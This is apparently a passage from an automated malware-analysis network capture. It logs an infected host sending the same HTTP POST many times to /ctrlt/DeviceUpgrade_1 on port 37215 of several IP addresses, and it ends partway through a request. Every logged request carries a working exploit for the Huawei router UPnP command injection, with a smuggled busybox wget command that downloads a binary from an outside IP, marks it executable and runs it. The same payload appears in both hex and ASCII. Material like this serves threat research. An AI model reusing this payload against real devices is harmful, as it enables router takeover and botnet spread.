                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951617956 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      52192.168.2.143410641.238.251.5437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.606035948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.934194088 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.418052912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.410090923 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.362127066 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.425892115 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.361486912 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:35.976912022 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:06.951649904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      53192.168.2.1443570197.181.243.637215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.607578039 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
